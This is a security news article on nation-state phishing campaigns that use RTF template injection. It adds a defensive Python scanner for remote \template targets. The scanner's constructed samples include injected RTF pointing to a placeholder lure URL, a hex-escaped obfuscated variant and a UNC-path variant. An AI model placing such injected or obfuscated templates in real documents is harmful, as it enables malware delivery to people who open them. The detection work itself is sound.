Last Updated on 07/12/2021 by Nidhi Khandelwal
Hacking groups backed by nation states are using a simple but effective new technique in their phishing campaigns to spread malware and steal information of interest to their governments.
Advanced persistent threat (APT) groups acting on behalf of Russian, Chinese, and Indian interests are exploiting rich text format (RTF) template injection, according to Proofpoint researchers.
RTF attachments in phishing emails are nothing new, but this technique is easier to deploy and more effective: antivirus software has a harder time detecting the injected files, and many organisations don’t block RTF attachments by default because the format is used in everyday business.
The method is RTF template injection. An attacker weaponises an RTF file by altering its document-formatting properties, specifically the template control word that normally points to a local .dotm template, so that it instead requests content from a URL the attacker controls. That lets them quietly retrieve a malicious payload and deliver it to the victim’s PC.
When the victim opens such a file in Microsoft Word, Word fetches the remote template from the malicious URL while rendering the decoy document, so the victim sees an ordinary-looking file.
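Because the injected control word is plain text inside the RTF, a detection can look for it directly. The scanner below is an added example, not code from Proofpoint or this article: it walks each `{\*\template ...}` group, decodes RTF `\'hh` hex escapes (a cheap way to hide a URL from naive string matching), and flags targets that point to an http(s) URL or a UNC path rather than a local file. The sample RTF snippets, the `example.invalid` URL and the `10.0.0.5` share are constructed placeholders, and the rule that only http(s) and UNC targets count as remote is this example’s assumption.

```python
"""Scan RTF content for template injection: a {\\*\\template ...} group whose
target is remote (http/https URL or UNC path) instead of a local .dotm.
Added example; sample RTF below is constructed, URLs/paths are placeholders."""
from __future__ import annotations

import re
import sys

_TEMPLATE_OPEN = re.compile(rb"\{\\\*\\template\b")          # "{\*\template"
# Assumption: http(s) URLs and UNC paths count as remote; ftp:// etc. are not checked.
_REMOTE_TARGET = re.compile(r"^(?:https?://|\\\\)", re.IGNORECASE)


def _is_ascii_alpha(b: int) -> bool:
    return 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A


def _group_body(data: bytes, start: int) -> bytes:
    """Raw bytes from `start` up to the '}' closing the group opened before it.
    Backslash escapes are skipped so escaped braces don't upset the depth count."""
    depth, i = 1, start
    while i < len(data):
        c = data[i]
        if c == 0x5C:                      # backslash: skip escaped char / control symbol
            i += 2
            continue
        if c == 0x7B:                      # '{' nested group
            depth += 1
        elif c == 0x7D:                    # '}'
            depth -= 1
            if depth == 0:
                return data[start:i]
        i += 1
    return data[start:]                    # unterminated group: take what is there


def _plain_text(body: bytes) -> bytes:
    """Decode \\'hh hex escapes, unescape \\{ \\} \\\\, drop control words and braces."""
    out, i, n = bytearray(), 0, len(body)
    while i < n:
        c = body[i]
        if c == 0x5C and i + 1 < n:
            nxt = body[i + 1]
            if nxt == 0x27 and i + 3 < n:                  # \'hh
                try:
                    out.append(int(body[i + 2:i + 4], 16))
                    i += 4
                    continue
                except ValueError:
                    pass
            if nxt in (0x7B, 0x7D, 0x5C):                  # \{ \} \\
                out.append(nxt)
                i += 2
                continue
            if _is_ascii_alpha(nxt):                       # control word \word[-]digits[ ]
                j = i + 2
                while j < n and _is_ascii_alpha(body[j]):
                    j += 1
                if j < n and body[j] == 0x2D:
                    j += 1
                while j < n and 0x30 <= body[j] <= 0x39:
                    j += 1
                if j < n and body[j] == 0x20:
                    j += 1
                i = j
                continue
            i += 2                                         # other control symbol
            continue
        if c in (0x7B, 0x7D):                              # nested group delimiters
            i += 1
            continue
        out.append(c)
        i += 1
    return bytes(out)


def extract_template_targets(data: bytes) -> list[str]:
    """Every template target declared in the RTF, de-obfuscated."""
    return [_plain_text(_group_body(data, m.end())).strip().decode("latin-1")
            for m in _TEMPLATE_OPEN.finditer(data)]


def find_remote_templates(data: bytes) -> list[str]:
    """Template targets that would make Word fetch content from elsewhere."""
    return [t for t in extract_template_targets(data) if _REMOTE_TARGET.match(t)]


def _hex_escape(s: str) -> bytes:          # builds the obfuscated sample
    return b"".join(b"\\'%02x" % ch for ch in s.encode("ascii"))


# Constructed samples (not real malware): local template, injected URL,
# the same URL hidden behind hex escapes, and a UNC path.
BENIGN_RTF = b"{\\rtf1\\ansi{\\*\\template C:\\\\Users\\\\me\\\\Templates\\\\Normal.dotm}Report\\par}"
INJECTED_RTF = b"{\\rtf1\\ansi{\\*\\template http://example.invalid/lure.dotm}Report\\par}"
OBFUSCATED_RTF = (b"{\\rtf1\\ansi{\\*\\template "
                  + _hex_escape("http://example.invalid/lure.dotm") + b"}Report\\par}")
UNC_RTF = b"{\\rtf1\\ansi{\\*\\template \\\\\\\\10.0.0.5\\\\share\\\\lure.dotm}Report\\par}"

if __name__ == "__main__":
    blobs = {p: open(p, "rb").read() for p in sys.argv[1:]} or {
        "benign": BENIGN_RTF, "injected": INJECTED_RTF,
        "obfuscated": OBFUSCATED_RTF, "unc": UNC_RTF}
    for name, blob in blobs.items():
        hits = find_remote_templates(blob)
        print(f"{name}: {'REMOTE TEMPLATE ' + ', '.join(hits) if hits else 'ok'}")
```

Run it with one or more `.rtf` paths to scan real attachments, or with no arguments to see the four constructed samples classified; a mail gateway or EDR rule can wrap `find_remote_templates` the same way. The de-obfuscation step matters: a YARA rule that only matches the literal string `http` after `\template` is defeated by the hex-escaped variant.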
The attack may still require persuading the user to click “Enable Editing” or “Enable Content” before the payload download proceeds, but with the right social engineering, especially a convincing lure, a victim can be talked into doing so.
It is not a sophisticated approach, but because it is easy to use and reliable it has become popular with several nation-state operations, which can use RTF template injection instead of more complex attacks and get the same result.
Despite the “Advanced” label, APT actors will use the least amount of resources and sophistication to get access to organisations, according to Sherrod DeGrippo, vice president of Proofpoint’s threat research and detection.